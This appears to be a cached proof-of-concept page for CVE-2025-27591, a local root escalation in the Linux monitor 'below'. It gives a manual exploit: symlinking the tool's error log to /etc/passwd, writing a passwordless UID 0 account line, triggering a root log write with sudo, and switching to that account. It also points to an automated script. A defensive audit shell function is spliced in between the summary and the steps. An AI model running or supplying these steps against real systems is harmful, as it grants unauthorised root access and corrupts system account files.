POC details: 874472d058b230707d5a04a2ae4bb73e075b3b6a

Source
Related vulnerability
Title: below security vulnerability (CVE-2025-27591)
Description: below is an open-source resource monitor for modern Linux systems from Meta Incubator. Versions of below before v0.9.0 contain a security vulnerability: the tool creates a world-writable directory, which can allow privilege escalation to root through a symlink attack.
Description
CVE-2025-27591 is a known privilege escalation vulnerability in the Below service (version < v0.9.0)
Introduction
# CVE-2025-27591 - Privilege Escalation via Writable Symlink in `below`

## Summary

This is a simple exploit for **CVE-2025-27591**, a local privilege escalation vulnerability in the `below` Linux system monitoring tool. The vulnerability affects versions prior to v0.9.0 and stems from incorrect permission assignments in the system. The issue was discovered in January 2025 and publicly disclosed on March 12, 2025 (SecurityOnline, OpenWall). When `below` is run with `sudo`, it may log errors into a world-writable directory (`/var/log/below`), allowing attackers to symlink a log file to sensitive targets like `/etc/passwd`.

By exploiting this, an unprivileged user with `sudo` access to `below` can escalate privileges to root.

---

## Vulnerability Details

- **CVE ID**: CVE-2025-27591
- **Vulnerable Tool**: `below`
- **Affected Feature**: Logging via `below record`
- **Vulnerable Path**: `/var/log/below/error_root.log`
- **Attack Prerequisites**:
  - The directory `/var/log/below` is world-writable
  - The attacker can run `sudo /usr/bin/below record` without a password
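As an added defender-side check (not part of the original PoC or of the `below` project), the POSIX shell function below audits the two prerequisites just listed: whether the log directory is world-writable, and whether any file inside it is a symlink rather than a real log file. The directory defaults to `/var/log/below` but is taken as a parameter so the function can be exercised against a scratch directory; the exit status is a bitmask (1 = world-writable directory, 2 = symlinked file present, 3 = both). Running it before and after upgrading past v0.9.0, or after tightening the directory's permissions, confirms whether the precondition the exploit needs is still present.

```shell
#!/bin/sh
# Added audit helper (not part of the original PoC or of below itself):
# reports the two preconditions the write-up relies on, a world-writable
# log directory and a log file that is really a symlink.
# Usage: audit_below_logdir [DIR]   (DIR defaults to /var/log/below)
# Exit status bitmask: 0 clean, 1 world-writable dir, 2 symlinked file, 3 both.

audit_below_logdir() {
    dir="${1:-/var/log/below}"
    status=0

    if [ ! -d "$dir" ]; then
        echo "audit: $dir does not exist, nothing to check"
        return 0
    fi

    # Column 9 of 'ls -ld' output is the write bit for 'other'
    # (drwxrwxrwx -> 'w'). A world-writable directory is what lets an
    # unprivileged user place a file named error_root.log in it.
    other_write=$(ls -ld "$dir" | cut -c9)
    if [ "$other_write" = "w" ]; then
        echo "WARN: $dir is world-writable ($(ls -ld "$dir" | cut -c1-10))"
        status=$((status | 1))
    fi

    # Any symlink in the log directory is suspicious: below writes its
    # error log here as root, so a link redirects that privileged write.
    for f in "$dir"/* "$dir"/.*; do
        case "$f" in */.|*/..) continue ;; esac
        # Skip the unmatched glob pattern itself; keep dangling links.
        [ -e "$f" ] || [ -L "$f" ] || continue
        if [ -L "$f" ]; then
            echo "WARN: $f is a symlink -> $(readlink "$f")"
            status=$((status | 2))
        fi
    done

    if [ "$status" -eq 0 ]; then
        echo "OK: $dir is not world-writable and contains no symlinked files"
    fi
    return "$status"
}

# Default invocation audits the real directory; pass a path to check another.
audit_below_logdir "$@"
```

The check only looks at the directory's own mode and at direct children; on a host where `below` has been upgraded the directory mode reported in the first line is the value to compare against the `drwxrwxrwx` shown in Step 1.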

---

# Exploit Steps (Manual)

✅ Step 1: Verify world-writable log directory
Check the directory's permissions (for example with `ls -ld /var/log/below`). You should see:

```bash
drwxrwxrwx 2 root root 4096 ... /var/log/below
```

![alt text](/Images/image.png)

✅ Step 2: Remove any existing `error_root.log`

```bash
rm -f /var/log/below/error_root.log
```

✅ Step 3: Create a symlink to /etc/passwd

```bash
ln -s /etc/passwd /var/log/below/error_root.log
```

then check using

```bash
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd
```

![alt text](/Images/image2.png)

✅ Step 4: Create a payload file
This will add a new passwordless user (named `dollarboysushil` in the line below) with UID 0, i.e. a root account:

```bash
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
```

An `/etc/passwd` line has the following structure:

```bash
username:password:UID:GID:comment(home/full name):home_directory:shell
```

The key fields are the UID and GID: setting both to 0 makes the new account a root user whose primary group is the root group.
![alt text](/Images/image3.png)

✅ Step 5: Trigger log write as root
This is the core of the exploit.

```bash
sudo /usr/bin/below record
```

This command is expected to fail or time out, but it will try to write its error log to `/var/log/below/error_root.log`, which now resolves to `/etc/passwd`.
💡 In some cases this alone may already corrupt `/etc/passwd`, so the next step overwrites it fully.

✅ Step 6: Overwrite /etc/passwd via symlink

```bash
cp /tmp/payload /var/log/below/error_root.log
```

![alt text](/Images/image4.png)

✅ Step 7: Become root

```bash
# use the username written into the payload in Step 4
su dollarboysushil
```

You'll drop into a root shell, no password needed.
![alt text](/Images/image5.png)

# Exploit Steps (Automatic)

```bash
python3 dbs_exploit.py
```

![alt text](/Images/image6.png)
File snapshot

```
[4.0K] /data/pocs/874472d058b230707d5a04a2ae4bb73e075b3b6a
├── [1.6K] dbs_exploit.py
├── [4.0K] Images
│   ├── [137K] image2.png
│   ├── [ 77K] image3.png
│   ├── [ 23K] image4.png
│   ├── [ 94K] image5.png
│   ├── [268K] image6.png
│   └── [ 45K] image.png
└── [2.7K] README.md

1 directory, 8 files
```

The Shenlong bot has cached this for you
Notes
    1. It is recommended to access the PoC through its source first.
    2. If the source is unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for local POCs. Thank you for your support.